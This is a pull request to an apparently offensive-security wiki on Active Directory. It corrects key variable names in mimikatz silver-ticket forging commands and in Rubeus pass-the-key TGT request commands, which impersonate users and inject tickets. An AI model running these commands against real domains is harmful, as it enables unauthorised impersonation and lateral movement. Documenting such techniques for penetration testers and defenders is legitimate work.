### PR TITLE
Fix: parameter variable name

### DIFF
--- a/ad/movement/kerberos/forged-tickets/silver.md
+++ b/ad/movement/kerberos/forged-tickets/silver.md
@@ -37,13 +37,13 @@ On Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) can be used to ge
 
 ```bash
 # with an NT hash
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 
 # with an AES 128 key
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 
 # with an AES 256 key
-kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
+kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
 ```
 
 For both mimikatz and Rubeus, the `/ptt` flag is used to automatically [inject the ticket](../ptt.md#injecting-the-ticket).

--- a/ad/movement/kerberos/ptk.md
+++ b/ad/movement/kerberos/ptk.md
@@ -42,10 +42,10 @@ On Windows, requesting a TGT can be achieved with [Rubeus](https://github.com/Gh
 Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt
 
 # with an AES 128 key
-Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$NThash /ptt
+Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt
 
 # with an AES 256 key
-Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$NThash /ptt
+Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt
 ```
 
 An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).


### PR DESCRIPTION
For the Silver Ticket the key we need it's the service account's key not the krbtgt.